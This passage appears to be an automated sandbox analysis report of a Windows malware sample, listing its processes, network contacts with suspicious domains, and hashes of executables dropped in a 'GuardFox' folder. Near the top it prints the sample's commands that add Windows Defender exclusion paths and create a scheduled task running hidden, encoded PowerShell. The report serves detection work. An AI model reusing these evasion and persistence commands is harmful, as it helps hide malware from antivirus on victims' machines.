"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\fvLIfGGBBdNYLYAis /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LVCnHeNtpGpwKZds /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\LVCnHeNtpGpwKZds /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gNeYrIDgN" /SC once /ST 05:31:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gNeYrIDgN"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 104.26.8.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | 45.16.20.195.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.8.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.186.117.34.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | cczhk.com | udp |
| US | 8.8.8.8:53 | 294down-river.sbs | udp |
| US | 104.21.67.206:80 | 294down-river.sbs | tcp |
| PA | 200.46.202.73:80 | cczhk.com | tcp |
| DE | 185.172.128.127:80 | 185.172.128.127 | tcp |
| US | 8.8.8.8:53 | def.bestsup.su | udp |
| US | 8.8.8.8:53 | vk.com | udp |
| US | 8.8.8.8:53 | acenitive.shop | udp |
| US | 8.8.8.8:53 | monoblocked.com | udp |
| RU | 147.45.47.101:80 | 147.45.47.101 | tcp |
| US | 8.8.8.8:53 | cleued.com | udp |
| US | 8.8.8.8:53 | medfioytrkdkcodlskeej.net | udp |
| US | 104.21.67.206:443 | 294down-river.sbs | tcp |
| US | 172.67.171.112:80 | def.bestsup.su | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| US | 8.8.8.8:53 | 206.67.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.202.46.200.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.128.172.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.171.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.4.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.47.45.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.96.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.137.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.41.130.45.in-addr.arpa | udp |
| PA | 200.46.202.73:80 | cczhk.com | tcp |
| US | 8.8.8.8:53 | triedchicken.net | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 172.67.180.119:80 | triedchicken.net | tcp |
| RU | 45.130.41.108:80 | monoblocked.com | tcp |
| RU | 91.215.85.209:80 | medfioytrkdkcodlskeej.net | tcp |
| US | 172.67.180.119:443 | triedchicken.net | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 91.215.85.209:443 | medfioytrkdkcodlskeej.net | tcp |
| RU | 45.130.41.108:443 | monoblocked.com | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| US | 188.114.96.2:80 | acenitive.shop | tcp |
| US | 104.21.4.60:80 | cleued.com | tcp |
| US | 188.114.96.2:443 | acenitive.shop | tcp |
| US | 188.114.96.2:443 | acenitive.shop | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 104.21.4.60:443 | cleued.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | x2.c.lencr.org | udp |
| US | 8.8.8.8:53 | pergor.com | udp |
| US | 172.67.156.81:443 | pergor.com | tcp |
| GB | 2.19.169.32:80 | x2.c.lencr.org | tcp |
| US | 8.8.8.8:53 | 119.180.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.169.19.2.in-addr.arpa | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| US | 8.8.8.8:53 | 81.156.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.179.17.96.in-addr.arpa | udp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | carthewasher.net | udp |
| US | 104.21.82.182:443 | carthewasher.net | tcp |
| US | 8.8.8.8:53 | 226.21.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.82.21.104.in-addr.arpa | udp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | 632432.site | udp |
| US | 8.8.8.8:53 | sun6-21.userapi.com | udp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-22.userapi.com | udp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| NL | 95.142.206.2:443 | sun6-22.userapi.com | tcp |
| US | 8.8.8.8:53 | 226.20.18.104.in-addr.arpa | udp |
| NL | 194.104.136.64:443 | 632432.site | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | psv4.userapi.com | udp |
| RU | 87.240.190.89:443 | psv4.userapi.com | tcp |
| NL | 95.142.206.1:443 | sun6-21.userapi.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| US | 8.8.8.8:53 | sun6-20.userapi.com | udp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| RU | 87.240.137.164:80 | vk.com | tcp |
| RU | 87.240.137.164:443 | vk.com | tcp |
| NL | 95.142.206.0:443 | sun6-20.userapi.com | tcp |
| US | 8.8.8.8:53 | 1.206.142.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.206.142.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.136.104.194.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.190.240.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.206.142.95.in-addr.arpa | udp |
| NL | 195.20.16.45:80 | 195.20.16.45 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 172.67.147.32:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 104.21.4.208:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | 32.147.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.4.21.104.in-addr.arpa | udp |
| DE | 185.172.128.24:80 | 185.172.128.24 | tcp |
| US | 8.8.8.8:53 | api.2ip.ua | udp |
| US | 8.8.8.8:53 | 24.128.172.185.in-addr.arpa | udp |
| US | 172.67.139.220:443 | api.2ip.ua | tcp |
| US | 8.8.8.8:53 | 220.139.67.172.in-addr.arpa | udp |
| RU | 193.233.132.67:50505 | tcp | |
| US | 8.8.8.8:53 | 67.132.233.193.in-addr.arpa | udp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| US | 8.8.8.8:53 | villagemagneticcsa.fun | udp |
| US | 8.8.8.8:53 | healthproline.pro | udp |
| US | 8.8.8.8:53 | api.myip.com | udp |
| US | 188.114.97.2:443 | healthproline.pro | tcp |
| US | 104.26.9.59:443 | api.myip.com | tcp |
| US | 8.8.8.8:53 | chocolatedepressofw.fun | udp |
| US | 8.8.8.8:53 | 130.147.105.77.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lighterepisodeheighte.fun | udp |
| US | 8.8.8.8:53 | ipinfo.io | udp |
| US | 34.117.186.192:443 | ipinfo.io | tcp |
| US | 8.8.8.8:53 | problemregardybuiwo.fun | udp |
| US | 8.8.8.8:53 | prescriptionstorageag.fun | udp |
| US | 8.8.8.8:53 | 2.97.114.188.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | theoryapparatusjuko.fun | udp |
| US | 8.8.8.8:53 | edurestunningcrackyow.fun | udp |
| US | 8.8.8.8:53 | pooreveningfuseor.pw | udp |
| US | 8.8.8.8:53 | snuggleapplicationswo.fun | udp |
| US | 8.8.8.8:53 | turkeyunlikelyofw.shop | udp |
| US | 8.8.8.8:53 | smallrabbitcrossing.site | udp |
| US | 188.114.96.2:443 | turkeyunlikelyofw.shop | tcp |
| US | 8.8.8.8:53 | punchtelephoneverdi.store | udp |
| US | 8.8.8.8:53 | telephoneverdictyow.site | udp |
| RU | 193.233.132.49:53 | strainriskpropos.store | udp |
| RU | 193.233.132.49:53 | associationokeo.shop | udp |
| US | 104.21.10.242:443 | associationokeo.shop | tcp |
| RU | 193.233.132.49:53 | 49.132.233.193.in-addr.arpa | udp |
| RU | 193.233.132.49:53 | 242.10.21.104.in-addr.arpa | udp |
| DE | 77.105.147.130:80 | 77.105.147.130 | tcp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| RU | 193.233.132.49:53 | t.me | udp |
| NL | 195.20.16.46:80 | 195.20.16.46 | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| RU | 193.233.132.49:53 | 46.16.20.195.in-addr.arpa | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | 99.167.154.149.in-addr.arpa | udp |
| DE | 142.132.224.223:9001 | 142.132.224.223 | tcp |
| US | 8.8.8.8:53 | 223.224.132.142.in-addr.arpa | udp |
| DE | 142.132.224.223:9001 | 142.132.224.223 | tcp |
| DE | 142.132.224.223:9001 | 142.132.224.223 | tcp |
| US | 8.8.8.8:53 | iplis.ru | udp |
| US | 104.21.63.150:443 | iplis.ru | tcp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 172.67.132.113:443 | iplogger.org | tcp |
| DE | 142.132.224.223:9001 | 142.132.224.223 | tcp |
| US | 8.8.8.8:53 | 150.63.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.132.67.172.in-addr.arpa | udp |
| RU | 5.42.65.31:48396 | tcp | |
| US | 8.8.8.8:53 | 234.16.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.65.42.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | sjyey.com | udp |
| MX | 201.119.110.201:80 | sjyey.com | tcp |
| MX | 201.119.110.201:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | 201.110.119.201.in-addr.arpa | udp |
| MX | 201.119.110.201:80 | sjyey.com | tcp |
| MX | 201.119.110.201:80 | sjyey.com | tcp |
| MX | 201.119.110.201:80 | sjyey.com | tcp |
| MX | 201.119.110.201:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | 1ea84d9c-98da-4805-a5de-9748a9882c91.uuid.statsexplorer.org | udp |
| RU | 193.233.132.49:53 | sjyey.com | udp |
| US | 8.8.8.8:53 | sjyey.com | udp |
| KR | 211.168.53.110:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | 110.53.168.211.in-addr.arpa | udp |
| KR | 211.168.53.110:80 | sjyey.com | tcp |
| KR | 211.168.53.110:80 | sjyey.com | tcp |
| KR | 211.168.53.110:80 | sjyey.com | tcp |
| US | 8.8.8.8:53 | server14.statsexplorer.org | udp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 8.8.8.8:53 | stun1.l.google.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| NL | 74.125.128.127:19302 | stun1.l.google.com | udp |
| BG | 185.82.216.108:443 | server14.statsexplorer.org | tcp |
| US | 8.8.8.8:53 | carsalessystem.com | udp |
| US | 172.67.221.71:443 | carsalessystem.com | tcp |
| US | 8.8.8.8:53 | 127.128.125.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.133.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.216.82.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.221.67.172.in-addr.arpa | udp |
Files
memory/1136-0-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-1-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-2-0x00007FFFB65A0000-0x00007FFFB6869000-memory.dmp
memory/1136-3-0x00007FFFB7480000-0x00007FFFB753E000-memory.dmp
memory/1136-4-0x00007FFFB65A0000-0x00007FFFB6869000-memory.dmp
memory/1136-5-0x00007FFF80000000-0x00007FFF80002000-memory.dmp
memory/1136-6-0x00007FFF80030000-0x00007FFF80031000-memory.dmp
memory/1136-7-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-8-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-9-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-10-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-11-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-12-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-13-0x00007FFFB8A30000-0x00007FFFB8C25000-memory.dmp
C:\Users\Admin\Documents\GuardFox\7cKnjzD2VH8mdogK6Yqc74fk.exe
| MD5 | 852f8672ad668dbef934f55b4d098973 |
| SHA1 | 75713a5a598e5eccb863f6670ff4e5738058a64e |
| SHA256 | 5bd8c1d6809b1605876dc47c8a04312ebbbb7fc5d443ea81b1e3665c2fc34428 |
| SHA512 | 5dadb891221cf37f451e563e775f793146c549390f1cd8524462f000b4ccc7337451997f00f089082674744ba9cd9a387615394f7428f48b69c429587ede0426 |
C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
| MD5 | 08ae943738a43f39ca279a003fa3e4a2 |
| SHA1 | b84294ead8a676e75064419062a84ffac825b8d5 |
| SHA256 | da9835d067dae3fafa046036707ecbabf4b6920091568266f1af3f1072469d74 |
| SHA512 | 575a23ee68bbc21915f280d65515fcfccdeaf57f9d74af8e747b33bc50f66bf4ecdb15c13164275bd20e4fd6ec6bd16e614b7965f379b924ff5f7fca3147b742 |
memory/1136-44-0x0000000140000000-0x0000000140B9C000-memory.dmp
C:\Users\Admin\Documents\GuardFox\aOiKcNVG4FAxtldCM7_Aj8fa.exe
| MD5 | 43abfd80cbfe8afaa65961856640efc4 |
| SHA1 | 71614b90bb167b289d6d01d3768727eb6ac61ec5 |
| SHA256 | f125414e6c33771e07ed5b186e765c5c7cbab090deee72d70af657f1b4abf691 |
| SHA512 | bf84a17d811fcd20602a49121731399517e327cf5b1af015d1967af7d741c1b1b03219da0d62b1d9f8abdd800ef7edca83acb7ca909deffdc5023853ea8b540e |
C:\Users\Admin\Documents\GuardFox\MHJl5U5jh6JBITZpQcz7bkql.exe
| MD5 | e654823683cb9be41044f5a800be69fd |
| SHA1 | d43214c03a47f3b0c77a82eca775d702eaa025e8 |
| SHA256 | 68abca4995919db0fe3a4e9158062759b2267ebcd8e3036f7eb8e71ed6202c85 |
| SHA512 | d20b18482b8f85bfa887495275712527939b388f912eac2388b2c446d4370a87118c01482898316b943667b2525b9b089d44e8e693cc6c5a6d9355ab2d9e6bcc |
C:\Users\Admin\Documents\GuardFox\rKlG0105_QMP5yCEVWPcwfwN.exe
| MD5 | 631393c67cb220cf18796dec2314c118 |
| SHA1 | 751638c8a1b070b354231a2fd4283f02f303ca94 |
| SHA256 | e98c24e3639daa42b133774bce94eb385d68b2a81be6fe460c997c5be900a600 |
| SHA512 | b41105af3663da05fd2382735aede37da71a5d85ba1051a7fba03f6beeb556d842015e9977171de3285d7bbe47a41200db8de9748c3b4629d342d013593c07d6 |
C:\Users\Admin\Documents\GuardFox\GcY5mYzrooPu5n33Ou1uEsNN.exe
| MD5 | a6b7675ef59c1f70955db3b35a908ba5 |
| SHA1 | 4651853419533386ca296714a0ef4f0b69993ed7 |
| SHA256 | 3b3dd4ca3ccb3efb70ff120ec887f84927eef73f324028730d7942bf279dab69 |
| SHA512 | 7bd39cc3ef5f555a96e3d7cdb7ead3c419a5a219fbe3bf30a5f2017e2ea8ba1815ecc7ff0b51cde7d21b8d0e2c24bbf84742351ee4cb2b30df0f22e529879c04 |
C:\Users\Admin\Documents\GuardFox\AKmdx4Gwhho65sDuSBTecSxH.exe
| MD5 | 61b46e3330294cfb1f16aebffead19a7 |
| SHA1 | 8171ae0853f7d0c9eac8821e3b345c8617d52864 |
| SHA256 | 4268a8b962ae3d55dcd7359124ed3166f3853f54ef3695194cdc78dc693a1c78 |
| SHA512 | 30128125b931896529ecd858bf1c11411f20d3f5e1821920c50151de3f3597b7b5ded72b563bbc5692fc31f97861dad036b0f7e650b64bc7e7eee405dc31dfb5 |
C:\Users\Admin\Documents\GuardFox\ZXVOsXkq1YByDDKKVRvePpsA.exe
| MD5 | 284a6460a21e15f1018bc2b29ca92cb9 |
| SHA1 | e2126fc74e04e72e83b99568565f82f6214d8fff |
| SHA256 | ccb4070a95d7bcd45e8ef95712e5bd022c5fafdccefc992d2768d8b23fce6ce4 |
| SHA512 | 65481ab3722d99c2c2e88e1bcaf27e8983ed290c5c11cfe5e313c613da3dd1202f7ccf2dde6194a28f27a39474bc42283502348b6cb26577676a9db97123ca68 |
C:\Users\Admin\Documents\GuardFox\ihJSiKtOCgQYcjTT87vV5pxv.exe
| MD5 | 0c0e3516291c7a8388225e215935a511 |
| SHA1 | e9f852be4417a12f094f6cce7b76621878193ef4 |
| SHA256 | 948c3a09c098e33324a0ddcaa71ef3f5501c80fbc6d5225e8ea29efe124f2719 |
| SHA512 | 6dbfbcc7b31451312e21dcc8f7873490b60adc4e545da05375b89c54e385c59c6f2c4cbf87229c4e7f3233dab4bbe1a91e1fbe507c566a444d6ad2f390bef470 |
C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
| MD5 | a2cd0ee55ac61c65ad6d4be2ef602c18 |
| SHA1 | d96591ad585284c13d277d578851ab6293d44310 |
| SHA256 | b68e8b42419bc60ff72822495bf99175506668091a58fbd1d11747e039192be7 |
| SHA512 | bfee5ab8e75ad1edd98a13bf456da9ccead22c40a518ceacf90f259026cdfc938b7da6003bc4fb79e22720b46d74b308b76fda65f638217af4148984f2aa97ec |
C:\Users\Admin\Documents\GuardFox\T83K0fj1RPNZcK5ce9BGYbEr.exe
| MD5 | 2117899a2ae435139133075f560e2ae2 |
| SHA1 | 17e212a4d9e9029cd65493ce4512df152f0f52da |
| SHA256 | 6c06f528548ea45c6080a37373ce9051592998b0943ddea3e41f020be225d6af |
| SHA512 | 7252bbad94df230a8a761a93d16cfadbe5ffe5c15b6bf0abefe86161b11458f729aa01eb94fec6ee6f28ea2e3032f573286ead7748e4f4640c9dd1938c158ff5 |
C:\Users\Admin\Documents\GuardFox\xVovRr115da5UGt7mKVb47Cj.exe
| MD5 | 8589e1a03503c53d3834f0a101cfdebf |
| SHA1 | 18e4a8dcf25ea22186afad558c9be2b4c12ae0ce |
| SHA256 | 4b3d11d2be51bd4f0426f30e6ca7ea58196d395ae69acd96c2bbe3f70f895ad7 |
| SHA512 | d91c8332b6025516b2916ef0c4ae64a547ed57562a0d916ccae4e0ec027b0e6162421634147d58c8713de5b50ced1af2fcf49a5d325459cccf76062cd2073704 |
C:\Users\Admin\Documents\GuardFox\Ipjb8_Ct3Bu5_uNThO5sOupY.exe
| MD5 | cadf3a652abcf29e5696a961f0c8722c |
| SHA1 | 8a8f03874a314e11cc8463a068934357ce37c1a3 |
| SHA256 | b1aa828f1cca97ee2d691473bd37acc92f89b0bc971020b836aaa432ebeb9f5c |
| SHA512 | 08628dcf11ce9f3a3cf2ee7b48679b08ed6563bb13e657cf2dae932cd104cc4b1a21b233626998195f7663660f9f04f485a0064e179a09488d67f8e0f7e7e0db |
C:\Users\Admin\Documents\GuardFox\griZbGlDTQ2Gp9lRWbcAmGPV.exe
| MD5 | d8666ba0b58b3d01ff7ebc4af4d85bbc |
| SHA1 | bdf372e47c847132b28cdd123851b7852dd0c73e |
| SHA256 | d50b970e3d61822619b1daf789d92859003316fe97be69c3f372902b700a461e |
| SHA512 | de46227f7c8d69347ec3e63ac4fb730ce4b95730155549586dcd67b86bed2124eb083e74645cc38fbd48d8fec6a964d9a69be3282973bef35b923a4a33fd133f |
C:\Users\Admin\Documents\GuardFox\WbpOVj2wdHtADLlWkCQJXyxg.exe
| MD5 | 4dfbb07f824d4f1106cc7fba9cbcfeb0 |
| SHA1 | f225ce68bc6dbcaed82aff71d96315f692c947d4 |
| SHA256 | 03097d72e93fc715793b38011623e2d8d4f98caabb082c6c80a53f27da95a10d |
| SHA512 | 700da5bcf66429ee440864421588692344078274940e4179c958479c63471f415da181397231ad9ad6033f641cc3a1cb6075c3461f00e173197281e65c5f0dfe |
C:\Users\Admin\Documents\GuardFox\FfTdssBgUOeUFS8ACw1xXwQq.exe
| MD5 | 4df6b172665dfb39cd972b1ea2fd663b |
| SHA1 | 1a470b00871154f2c1b52df6c134758230480661 |
| SHA256 | 8447700d10f668efa15aba5b02e0a3d031d94a2be170a166d009a3f2cc0f7408 |
| SHA512 | 52fa2b79cb4cb746c1958a2499c08e41febf4fef5bf1a92a88f61cbb5416abfd2c7e8b7b72a72fda955e9e4eb66bad3ff09788fdca402d2baaaee8f0dfd0fca2 |
C:\Users\Admin\Documents\GuardFox\Oo3P2P2VOFHTfbT2AUs5ehOf.exe
| MD5 | 768351e7fb4e73a68d6128a4ab7ccc4e |
| SHA1 | b2e42ae8d8f154800c6ade37ad6ce4e903da79de |
| SHA256 | e1af5fed9e816a4f21c4f25e8d1388d8e8deac07c9cacd2889b749f2ec28a396 |
| SHA512 | 76f96b1e6d962937822c05814c77ac8903ac612db07d8daa7ddb2fb7443e6151afc880daf5a8a3e42b4f3e8dc081f391cab3e8098fb4af8ac31ef81a66d20941 |
C:\Users\Admin\Documents\GuardFox\ozHYoRTpmXEy7Cy7N9wHNH1A.exe
| MD5 | fed2d84b943262bf613077cb6b4c8a94 |
| SHA1 | c2d14858043cc07e97a4bdf8295820dccfa9f27d |
| SHA256 | 5745125b7206b6081bbbc31910b2f49ba191538d3dbed38596b72dc0113cb276 |
| SHA512 | 1cc6a96b3d439d1574bcf35ecd3bee9f547e990db7ce7bce88415cafe4143421f51f05265d2302b65aa82e7dcaf29cf020d2e7660a7080bbc05910b219544904 |
memory/1136-175-0x0000000140000000-0x0000000140B9C000-memory.dmp
memory/1136-176-0x00007FFFB65A0000-0x00007FFFB6869000-memory.dmp
memory/1136-177-0x00007FFFB7480000-0x00007FFFB753E000-memory.dmp
C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
| MD5 | 9c576d968032836454e0a58edbf1c323 |
| SHA1 | 7ff4196a8d8485a7896cd62b5a5d9db1a2c3ce18 |
| SHA256 | cead2dbd95ade3e6bb868d9e77fcb18ebf6cb9932c9d6180c4090151357c50cb |
| SHA512 | f30153a60d33c2ebf48a6eb20fe888c8989db1f0019a4c45a4f6345d8d17ca03c9a8df3e171b8d78b2d21320b1efa93cb72a41882ba06568fe14b2719a23c0ba |
memory/1136-494-0x00007FFF80010000-0x00007FFF80011000-memory.dmp
C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
| MD5 | 8a120bdfb6ad1f75b7fac902f32bb8cb |
| SHA1 | fd0c241be8910a9e2c554997e974f4610c78ae3e |
| SHA256 | ecd909094e286954587baf39fe0857958eb390a3d27c903515f4766f188d9aee |
| SHA512 | b6cde752013010187547e797ad384605657c8d8b41707260b0a5e4dc05f40ec33a88b6979f77cc269c17277360b0f7e7b0193ae16b7497d8d504ed0f82b3ddb9 |
C:\Users\Admin\Documents\GuardFox\HBZbjdUX0pRpCqEGONC_Y2ES.exe
| MD5 | fac5e50e9e544238820d6983cb6294dc |
| SHA1 | 5745340468e28c977ca30d876d730e5c97f9ad1e |
| SHA256 | 6cf8e669f094acaf2b5f0768b6104cebe433748216c9e910a318fac95b32b613 |
| SHA512 | 7ce2077bd058d2635b4f02a166e656001b4ada01585290c53c46415a8579e4fd02a7768c16bffe2c423fdd6b7ab3f0f5417302a1c8c95c4ce5a81b561fa5483b |
C:\Users\Admin\Documents\GuardFox\JcMIo2ZYv_q90S6UZS5qMlPO.exe
| MD5 | 73029587fc2ebb4f669f3081b230a781 |
| SHA1 | 2cf6d0359b453915320afe717bad7d5d879573aa |
| SHA256 | c3797c9f1fa97f560f4845f2b131cc2ea42d7dd387045840fdb01877f12cc4e7 |
| SHA512 | a2241ed9f8260645248788fa5d2b8e7e08eb4bbeae7a1d5face7cbe168493793f894e3f99a9b2532ab486bd1298916479cf4798b85efe4203a701f8e7c61734b |
C:\Users\Admin\Documents\GuardFox\PRPSLOJESuJHQLjldDsEWa5D.exe
| MD5 | 2e3d733eeb2fe31537dea3bf01829816 |
| SHA1 | 4beaa01699b9b769ee1145e062b5df3c0b1819a5 |
| SHA256 | 8bedabe0337399cc7ba3c3be70b9cd139c2039588ae1b877677fdf291ae59e07 |
